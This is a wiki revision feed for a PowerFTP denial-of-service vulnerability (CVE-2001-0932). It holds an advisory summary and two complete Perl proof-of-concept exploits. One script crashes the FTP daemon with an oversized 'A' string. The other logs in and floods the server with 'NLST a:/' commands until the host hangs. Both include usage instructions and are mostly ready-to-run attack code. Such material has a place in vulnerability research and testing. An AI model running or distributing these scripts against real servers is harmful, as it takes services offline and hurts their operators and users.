<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2001-0932_Cooolsoft_PowerFTP%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2001-0932 Cooolsoft PowerFTP拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2001-0932_Cooolsoft_PowerFTP%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2001-0932_Cooolsoft_PowerFTP%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-13T18:30:02Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2001-0932_Cooolsoft_PowerFTP%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=792&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO1== &lt;pre&gt; source: http://www.securityfocus.com/bid/3595/info   PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is mainta...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2001-0932_Cooolsoft_PowerFTP%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=792&amp;oldid=prev"/>
		<updated>2021-03-31T06:35:56Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO1== &amp;lt;pre&amp;gt; source: http://www.securityfocus.com/bid/3595/info   PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is mainta...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO1==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source: http://www.securityfocus.com/bid/3595/info&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.&lt;br /&gt;
&lt;br /&gt;
Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.&lt;br /&gt;
&lt;br /&gt;
It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.&lt;br /&gt;
&lt;br /&gt;
This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. &lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
# Simple script to send a long 'A^s' command to the server, &lt;br /&gt;
# resulting in the ftpd crashing&lt;br /&gt;
#&lt;br /&gt;
# PowerFTP Server v2.03 proof-of-concept exploit&lt;br /&gt;
# By Alex Hernandez &amp;lt;al3x.hernandez@ureach.com&amp;gt; (C)2001.&lt;br /&gt;
#&lt;br /&gt;
# Thanks all the people from Spain and Argentina.&lt;br /&gt;
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, &lt;br /&gt;
# G.Maggiotti &amp;amp; H.Oliveira.&lt;br /&gt;
# &lt;br /&gt;
#&lt;br /&gt;
# Usage: perl -x PowerFTP_Dos.pl -s &amp;lt;server&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Example: &lt;br /&gt;
#&lt;br /&gt;
# perl -x PowerFTP_Dos.pl -s 10.0.0.1&lt;br /&gt;
# 220 Personal FTP Server ready&lt;br /&gt;
# Crash was successful !&lt;br /&gt;
#&lt;br /&gt;
&lt;br /&gt;
use Getopt::Std;&lt;br /&gt;
use IO::Socket;&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;\nPowerFTP server v2.03 DoS exploit (c)2001\n&amp;quot;);&lt;br /&gt;
print(&amp;quot;Alex Hernandez al3xhernandez\@ureach.com\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
getopts('s:', \%args);&lt;br /&gt;
if(!defined($args{s})){&amp;amp;usage;}&lt;br /&gt;
$serv = $args{s};&lt;br /&gt;
$foo = &amp;quot;A&amp;quot;; $number = 2048; &lt;br /&gt;
$data .= $foo x $number; $EOL=&amp;quot;\015\012&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
$remote = IO::Socket::INET-&amp;gt;new(&lt;br /&gt;
                    Proto =&amp;gt; &amp;quot;tcp&amp;quot;,&lt;br /&gt;
                    PeerAddr =&amp;gt; $args{s},&lt;br /&gt;
                    PeerPort =&amp;gt; &amp;quot;ftp(21)&amp;quot;,&lt;br /&gt;
                ) || die(&amp;quot;Unable to connect to ftp port at $args{s}\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
$remote-&amp;gt;autoflush(1);&lt;br /&gt;
print $remote &amp;quot;$data&amp;quot;. $EOL;&lt;br /&gt;
while (&amp;lt;$remote&amp;gt;){ print }&lt;br /&gt;
print(&amp;quot;\nCrash was successful !\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
sub usage {die(&amp;quot;\nUsage: $0 -s &amp;lt;server&amp;gt;\n\n&amp;quot;);}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==INFO2==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
source: http://www.securityfocus.com/bid/3595/info&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
PowerFTP is a commercial FTP server for Microsoft Windows 9x/ME/NT/2000/XP operating systems. It is maintained by Cooolsoft.&lt;br /&gt;
 &lt;br /&gt;
Multiple instances of denial of service vulnerabilities exist in PowerFTP's FTP daemon. This is achieved by connecting to a vulnerable host and submitting an unusally long string of arbitrary characters.&lt;br /&gt;
 &lt;br /&gt;
It has been reported that this issue may also be triggered by issuing an excessively long FTP command of 2050 bytes or more.&lt;br /&gt;
 &lt;br /&gt;
This issue may is most likely due to a buffer overflow. If this is the case, there is a possibility that arbitrary code may be executed on the vulnerable host. However, this has not yet been confirmed. &lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/perl&lt;br /&gt;
#&lt;br /&gt;
# Even though the server will deny access, the slow hardware &lt;br /&gt;
# will still hang the machine. This program attempts to &lt;br /&gt;
# exploit this weakness by sending the 'NLST a:/' command to &lt;br /&gt;
# the server &lt;br /&gt;
#&lt;br /&gt;
# PowerFTP Server v2.03 proof-of-concept exploit&lt;br /&gt;
# By Alex Hernandez &amp;lt;al3x.hernandez@ureach.com&amp;gt; (C)2001.&lt;br /&gt;
#&lt;br /&gt;
# Thanks all the people from Spain and Argentina.&lt;br /&gt;
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,&lt;br /&gt;
# G.Maggiotti &amp;amp; H.Oliveira.&lt;br /&gt;
# &lt;br /&gt;
#&lt;br /&gt;
# Usage: perl -x PowerFTP_floppy.pl &amp;lt;server&amp;gt; &amp;lt;port&amp;gt; &amp;lt;user&amp;gt; &amp;lt;pass&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Example: &lt;br /&gt;
#&lt;br /&gt;
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp&lt;br /&gt;
# &lt;br /&gt;
&lt;br /&gt;
use IO::Socket;&lt;br /&gt;
&lt;br /&gt;
print(&amp;quot;\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n&amp;quot;);&lt;br /&gt;
print(&amp;quot;Alex Hernandez al3xhernandez\@ureach.com\n\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
#$NUMBER_TO_SEND = 3000; &lt;br /&gt;
$BUFF = 3000; &lt;br /&gt;
&lt;br /&gt;
if ( scalar @ARGV &amp;lt; 4 ) {&lt;br /&gt;
    print &amp;quot;Usage: $0 &amp;lt;server&amp;gt; &amp;lt;port&amp;gt; &amp;lt;user&amp;gt; &amp;lt;pass&amp;gt;\n&amp;quot;;&lt;br /&gt;
    exit();&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
$target = $ARGV[ 0 ];&lt;br /&gt;
$port = $ARGV[ 1 ];&lt;br /&gt;
$username = $ARGV[ 2 ];&lt;br /&gt;
$password = $ARGV[ 3 ];&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;Creating socket... &amp;quot;;&lt;br /&gt;
$sock = new IO::Socket::INET( PeerAddr =&amp;gt; $target,&lt;br /&gt;
                              PeerPort =&amp;gt; int( $port ), &lt;br /&gt;
                                Proto =&amp;gt; 'tcp' );&lt;br /&gt;
die &amp;quot;$!&amp;quot; unless $sock;&lt;br /&gt;
print &amp;quot;done.\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
read( $sock, $buffer, 1 );&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;Sending username...&amp;quot;;&lt;br /&gt;
print $sock &amp;quot;USER &amp;quot; . $username . &amp;quot;\n&amp;quot;;&lt;br /&gt;
read( $sock, $buffer, 1 );&lt;br /&gt;
print &amp;quot;done.\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;Sending password...&amp;quot;;&lt;br /&gt;
print $sock &amp;quot;PASS &amp;quot; . $password . &amp;quot;\n&amp;quot;;&lt;br /&gt;
read( $sock, $buffer, 1 );&lt;br /&gt;
print &amp;quot;done.\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;DoS Attack floppy server...&amp;quot;;&lt;br /&gt;
for( $i = 0; $i &amp;lt; $BUFF; $i++ ) {&lt;br /&gt;
&lt;br /&gt;
    print $sock &amp;quot;NLST a:/\n&amp;quot;;   &lt;br /&gt;
    read( $sock, $buffer, 1 );&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
print &amp;quot;done.\n&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
close( $sock );&lt;br /&gt;
exit();&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>